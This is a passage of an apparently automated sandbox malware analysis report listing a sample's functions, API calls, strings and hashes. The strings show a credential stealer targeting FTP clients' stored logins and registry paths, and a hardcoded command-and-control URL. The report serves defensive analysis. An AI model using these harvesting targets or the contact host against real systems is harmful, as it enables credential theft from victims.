                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,00000000,?,?,?,00000000), ref: 00401AF8
                  • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401B1A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: QueryValue$CloseOpen
                  • String ID:
                  • API String ID: 1586453840-0
                  • Opcode ID: 734e63243a4b052f08d431ee154be782bdd0b703d78beaf39269d2a8b41075f7
                  • Instruction ID: fcd29aeafba084525d8cf8d477a30aef63fb09e727f4365931236e5964b75f7d
                  • Opcode Fuzzy Hash: 734e63243a4b052f08d431ee154be782bdd0b703d78beaf39269d2a8b41075f7
                  • Instruction Fuzzy Hash: 86213931A00109FBDF119E95CD42FEE7BB9AB41344F104076F900A61A0EB799E95DB59
                  Function 0040B9ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 85stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrcmpiA.KERNEL32(00000000,logins), ref: 0040BA2B
                  • lstrcmp.KERNEL32(table,?), ref: 0040BA60
                    • Part of subcall function 0040B6D9: StrStrIA.SHLWAPI(?,() ), ref: 0040B6E9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcmplstrcmpi
                  • String ID: logins$table
                  • API String ID: 3524194181-3800951466
                  • Opcode ID: 755972dacdf0f538ccdf233cfaf82257552857a2a336d6a9199289e497d3ea6f
                  • Instruction ID: e56b1581308bb119fc6df0d215a42fb934329492a1a349210f13653206e09008
                  • Opcode Fuzzy Hash: 755972dacdf0f538ccdf233cfaf82257552857a2a336d6a9199289e497d3ea6f
                  • Instruction Fuzzy Hash: 3331263190020DEBCF21AF90DC45ADE7B7CEB44324F508A67A120B52E4D735AA948B99
                  Function 00406B9D Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "password" : "
                  • API String ID: 0-2310853927
                  • Opcode ID: 1d96a41895556b83251d2f6e3fb8b7d77ae918bc5314d5579c167f32989cd641
                  • Instruction ID: 2d33af965a49b69b8bb2625fc5117d1ac98ebf99c167de9e1e88c861068832c0
                  • Opcode Fuzzy Hash: 1d96a41895556b83251d2f6e3fb8b7d77ae918bc5314d5579c167f32989cd641
                  • Instruction Fuzzy Hash: FA21AE31804119BADF12BBA1CD029EE7E75EF51348F110037F442B61B1D6BD5EA1A7AD
                  Function 0040CEAD Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 46COMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 0040CEF7
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeLocalwsprintf
                  • String ID: FTP Count$FTP File%d$SOFTWARE\Robo-FTP 3.7\Scripts
                  • API String ID: 988369812-376751567
                  • Opcode ID: b100f10a11de84d1554b8ee285c05a23e3408d70a51dad86b1af9e0baeba858a
                  • Instruction ID: 8ee0aa49f3dbd8388e6bbf4cfe452c84595b2709f6b7922b7d1b8c782d6353d8
                  • Opcode Fuzzy Hash: b100f10a11de84d1554b8ee285c05a23e3408d70a51dad86b1af9e0baeba858a
                  • Instruction Fuzzy Hash: 39017CB0900109FADF10AB91CC82EEEBA7AAB00315F108137F411B11E1D7BE9B849799
                  Function 00401226 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                  Download Yara Rule
                  APIs
                  • ExitProcess.KERNEL32(?,80000000,00000003,00000000,00000003,00000000), ref: 00401236
                  • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 0040125A
                  • CloseHandle.KERNEL32(?,?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 00401266
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseExitFileHandleProcessRead
                  • String ID:
                  • API String ID: 1390701169-0
                  • Opcode ID: 8f966ebd87d4ad1bdfb4cacc6edce40de60726eb4d26d5180a226f6d6868328b
                  • Instruction ID: 2769c8dea532226ecc7d7cd99d09141729edcd609d6b994a67629c6e1451f681
                  • Opcode Fuzzy Hash: 8f966ebd87d4ad1bdfb4cacc6edce40de60726eb4d26d5180a226f6d6868328b
                  • Instruction Fuzzy Hash: F5F0FF31A50109BADF21AB50DD02FDDBA78AB1534DF1040B7B540F50E0D7B99B98DB58
                  Function 00401BCD Relevance: 5.0, APIs: 4, Instructions: 29stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlen.KERNEL32(?), ref: 00401BEE
                  • lstrlen.KERNEL32(00000000,?), ref: 00401BF8
                  • lstrcpy.KERNEL32(00000000,?), ref: 00401C0C
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401C15
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$lstrcatlstrcpy
                  • String ID:
                  • API String ID: 2414487701-0
                  • Opcode ID: 80e65f7138c994cfb0136878f4e839e7a3c5ce9296fa90b956dbb6bd114dbf42
                  • Instruction ID: 7210d46c7f977a387d5a4157f85995c79d660d03c9cb68f517295ba27315881e
                  • Opcode Fuzzy Hash: 80e65f7138c994cfb0136878f4e839e7a3c5ce9296fa90b956dbb6bd114dbf42
                  • Instruction Fuzzy Hash: 7AF01C7520020CBEDF207F62CC81A993AA9EB1135DF10D03BB915291A2E77DC9889B68
                  Function 0040F8E7 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00403C18: WSAStartup.WSOCK32(00000101,?), ref: 00403C2D
                  • Sleep.KERNEL32(00001388,00000000,00000000,?,00000000), ref: 0040F9A3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: SleepStartup
                  • String ID: Client Hash$http://gunnylaumienphi2017.com/
                  • API String ID: 1372284471-2480438733
                  • Opcode ID: 30d78c3068bdcfbc927ffa464f9ab81e646ffec13decf9da64cf830e54140e18
                  • Instruction ID: 7f5d7b3c7258f9699e047d75cdfbc3d880843b63fda77a6a8c62c076c1915490
                  • Opcode Fuzzy Hash: 30d78c3068bdcfbc927ffa464f9ab81e646ffec13decf9da64cf830e54140e18
                  • Instruction Fuzzy Hash: D62115B190010AAADF31DBE1C9457BFB674AB04308F10043BE640719E1D7BD4E8DDBAA
                  Function 00409C84 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 57COMMON
                  Download Yara Rule
                  APIs
                  • StrStrIA.SHLWAPI(007203F8,Odin), ref: 00409CD6
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeLocal
                  • String ID: Odin$SiteInfo.QFP
                  • API String ID: 2826327444-4277389770
                  • Opcode ID: 7b2b0562af19308cab5df3c240f8d3627445577c8b0d13b07810e0c4eeb6aee6
                  • Instruction ID: 52af3856d4285a76f2f3712edfb672eb9e336cfc887af513c2a4a8862b141f07
                  • Opcode Fuzzy Hash: 7b2b0562af19308cab5df3c240f8d3627445577c8b0d13b07810e0c4eeb6aee6
                  • Instruction Fuzzy Hash: D901C430A4410579EB212B329D02FAE3E999B81314F24003BB815762E3D7BC9F41D2AD
                  Function 004071B4 Relevance: 4.6, APIs: 3, Instructions: 51registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004071C7
                  • RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004071FB
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040725E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpenValue
                  • String ID:
                  • API String ID: 4012628704-0
                  • Opcode ID: e3f31528690a5d0e6c30948a6af74a0b1baa7a872ff4fcafd0ccf506f34d5b5a
                  • Instruction ID: 86490294541cbf832a13796b5331e8b82cba92c417051bbcab69bd2e8fbd4de6
                  • Opcode Fuzzy Hash: e3f31528690a5d0e6c30948a6af74a0b1baa7a872ff4fcafd0ccf506f34d5b5a
                  • Instruction Fuzzy Hash: 1E11F87180410CBADF21AF90CC41BDEBBB9BF04304F1084BAB514B51A1DBB9AA959F99
                  Function 0040EF8E Relevance: 4.6, APIs: 3, Instructions: 50registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EFA1
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EFD5
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F02F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID:
                  • API String ID: 1332880857-0
                  • Opcode ID: dd645579e3552e097291bef1b6578a3e97a18589981779f92997be476961d565
                  • Instruction ID: 58e7d6fa5fdf71006491fd843ec2fce7242496fc44c56e62908c852a227b0491
                  • Opcode Fuzzy Hash: dd645579e3552e097291bef1b6578a3e97a18589981779f92997be476961d565
                  • Instruction Fuzzy Hash: 0011003590010CBADF11AF91CC01FDE7BB9BF04304F108976B514B51E1DBB99AA5AF54
                  Function 0040EEEF Relevance: 4.5, APIs: 3, Instructions: 48registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EF02
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EF32
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EF85
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID:
                  • API String ID: 1332880857-0
                  • Opcode ID: 2b145e644b25eb118bebfec26bb60c2a092f0f550df4e1e63f2e08a3bfc347f0
                  • Instruction ID: 79d6ce66a9fe8589202b4e2849e13dc79f14a179371f355af88fa3d1fb127eda
                  • Opcode Fuzzy Hash: 2b145e644b25eb118bebfec26bb60c2a092f0f550df4e1e63f2e08a3bfc347f0
                  • Instruction Fuzzy Hash: 1A110C3191010DBADF11AF91CC02FDE7BB9BF00304F2085B6B514B51A1DBB99AA1AF58
                  Function 0040C756 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 38COMMON
                  Download Yara Rule
                  APIs
                  • StrStrIA.SHLWAPI(?,EasyFTP), ref: 0040C78D
                    • Part of subcall function 00402200: lstrlen.KERNEL32(?), ref: 00402214
                    • Part of subcall function 00402200: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 00402233
                    • Part of subcall function 00402200: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402245
                    • Part of subcall function 00402200: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402257
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  • EasyFTP, xrefs: 0040C785
                  • SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32, xrefs: 0040C76F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: EasyFTP$SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
                  • API String ID: 1884169789-2776585315
                  • Opcode ID: ec2090e60952daeec575351be475198956329dce5317bbbe5c5100064533b710
                  • Instruction ID: 85cbf298f16898ee1e3ad3f2dea4e738ee09b13af73ee811f42477477b6d9026
                  • Opcode Fuzzy Hash: ec2090e60952daeec575351be475198956329dce5317bbbe5c5100064533b710
                  • Instruction Fuzzy Hash: 98F06D30A50209FAEF103BA1CC83FAD7E75AB00B44F20413ABA01791F2DBB95B509A5C
                  Function 00401C86 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00401769: LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 00401CB1
                  Strings
                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401CE6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocFolderLocalPath
                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                  • API String ID: 1254228173-2036018995
                  • Opcode ID: ecacdd65099fff17406014d1aaabd04013573c28d7e727f9bbd7af76f059d322
                  • Instruction ID: 97deef55f889460ea03d1c0e73911c6992c1b02bd37731b1ccd0826d76856a05
                  • Opcode Fuzzy Hash: ecacdd65099fff17406014d1aaabd04013573c28d7e727f9bbd7af76f059d322
                  • Instruction Fuzzy Hash: 93017171A48205EFEB119B54CE41B9AB7B4AB00714F248137E612BA1F0E778EA50EB4D
                  Function 00407A4B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                  Download Yara Rule
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00407A6F
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(?), ref: 00401BEE
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(00000000,?), ref: 00401BF8
                    • Part of subcall function 00401BCD: lstrcpy.KERNEL32(00000000,?), ref: 00401C0C
                    • Part of subcall function 00401BCD: lstrcat.KERNEL32(00000000,00000000), ref: 00401C15
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$DirectoryFreeLocalWindowslstrcatlstrcpy
                  • String ID: \32BitFtp.ini
                  • API String ID: 2776971706-1260517637
                  • Opcode ID: 1cb0484594f6157d45a57629beea73c99a87447080c23abbe336f535a30bf1ea
                  • Instruction ID: b264c63a17963ad57f187d581c1cea9d5644dcb8ea268a62fb368e62467bf330
                  • Opcode Fuzzy Hash: 1cb0484594f6157d45a57629beea73c99a87447080c23abbe336f535a30bf1ea
                  • Instruction Fuzzy Hash: E5F08270A00108BAEF10BBA1CC42FDE7A689F44748F100477B644F51E2DBF9AB905B5C
                  Function 004022AB Relevance: 3.0, APIs: 2, Instructions: 47libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryA.KERNEL32(?), ref: 004022B4
                  • GetProcAddress.KERNEL32(00000000,?), ref: 004022E2
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID:
                  • API String ID: 2574300362-0
                  • Opcode ID: 0f749165927d9a0347e95b2b40a320660c170a1640660f197713828e4d2df242
                  • Instruction ID: d06432f4dc182ffac08f2039f883e23e9f9a8286cc76ceb82120973f00c3edba
                  • Opcode Fuzzy Hash: 0f749165927d9a0347e95b2b40a320660c170a1640660f197713828e4d2df242
                  • Instruction Fuzzy Hash: 3DF0B47721501516D7106579AD44A9B6F88E7E3378B10513BF805B62C1E1FDDDC2C3A4
                  Function 0040E148 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 30stringCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen
                  • String ID: .xml
                  • API String ID: 1659193697-2937849440
                  • Opcode ID: 5612f15b83e4f5c0da68c40290cebea3554d9c95b9dfa89e0058544d4126d0e4
                  • Instruction ID: 09eced1d0fe3324484a059412de8bbb336304f1bc4f3e6890493b41d3b7db345
                  • Opcode Fuzzy Hash: 5612f15b83e4f5c0da68c40290cebea3554d9c95b9dfa89e0058544d4126d0e4
                  • Instruction Fuzzy Hash: 77F03A35900108FACF11EF91DD02ECDBB76AB15308F208176F211B51F0D7B95B64AB48
                  Function 00401D0B Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                  Download Yara Rule
                  APIs
                  • ExitProcess.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401D37
                  • CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401D44
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseExitHandleProcess
                  • String ID:
                  • API String ID: 1046136549-0
                  • Opcode ID: 7fa46683cff65880fc07046521540c40611a923bba942e464b42245b21033316
                  • Instruction ID: 98c49b96a8b54ac0c31122d9ec1678d3f25e6b270c6518dc4dcec6e943226a25
                  • Opcode Fuzzy Hash: 7fa46683cff65880fc07046521540c40611a923bba942e464b42245b21033316
                  • Instruction Fuzzy Hash: E7E0BF7235024537FB315569EC83F5676985B12758F604433B641FD2D1D5FDF940826C
                  Function 0040FF99 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                  Download Yara Rule
                  APIs
                  • GetTickCount.KERNEL32 ref: 0040FF99
                  • ExitProcess.KERNEL32(00000000), ref: 0040FFB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountExitProcessTick
                  • String ID:
                  • API String ID: 232575682-0
                  • Opcode ID: b844b7522c695be4dfb9276ea611e68d84ca933084dc7cddcdf456fcc53f69ad
                  • Instruction ID: 06dacf7b5bdf3065d43742cdf2570900850f9260e3093aa6ddbde68aacd5c01f
                  • Opcode Fuzzy Hash: b844b7522c695be4dfb9276ea611e68d84ca933084dc7cddcdf456fcc53f69ad
                  • Instruction Fuzzy Hash: FBC092A076C11349E2B87273094632E10035BE3708F65C03FF10A35DCA8DBC489E211F
                  Function 00401422 Relevance: 1.5, APIs: 1, Instructions: 28fileCOMMON
                  Download Yara Rule
                  APIs
                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401439
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileWrite
                  • String ID:
                  • API String ID: 3934441357-0
                  • Opcode ID: ccf179241871f6042aa2775e6511bbdf144520f0f47ed731e2d5e649bf96b33e
                  • Instruction ID: 251c42277766ed9646b5a9c3b1c0fe41e3bd1f0ee4844d3e2f798b7a9c3cdedb
                  • Opcode Fuzzy Hash: ccf179241871f6042aa2775e6511bbdf144520f0f47ed731e2d5e649bf96b33e
                  • Instruction Fuzzy Hash: C4E0393291011AABCF20DAA89C01BDE77A8AB11368F044136B910E62E0E7B5DB50C7A9
                  Function 0040FF9A Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                  Download Yara Rule
                  APIs
                  • GetTickCount.KERNEL32 ref: 0040FF99
                  • ExitProcess.KERNEL32(00000000), ref: 0040FFB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountExitProcessTick
                  • String ID:
                  • API String ID: 232575682-0
                  • Opcode ID: db0779cbd658f11ac7167aa01f898edc599809d2dbb1fe85f57ab945cd90ea10
                  • Instruction ID: 002f6f85b3c0520e91da88d753ec90e409b49d1574653ab2620fa8804466fc11
                  • Opcode Fuzzy Hash: db0779cbd658f11ac7167aa01f898edc599809d2dbb1fe85f57ab945cd90ea10
                  • Instruction Fuzzy Hash: FCC0122072C34189C36153611C5538A3A120B97304F55C0BBD004258D6D478088A425F
                  Function 00403C18 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                  Download Yara Rule
                  APIs
                  • WSAStartup.WSOCK32(00000101,?), ref: 00403C2D
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Startup
                  • String ID:
                  • API String ID: 724789610-0
                  • Opcode ID: 30164bad9e7e3c908d95e258457be95fc7c7aeee42e52043797345d1f1a8d3c3
                  • Instruction ID: 7b0ce69c0cb2004bd621d2ace6d0e8ba3c64a41308b07c2816557fadd6d817c3
                  • Opcode Fuzzy Hash: 30164bad9e7e3c908d95e258457be95fc7c7aeee42e52043797345d1f1a8d3c3
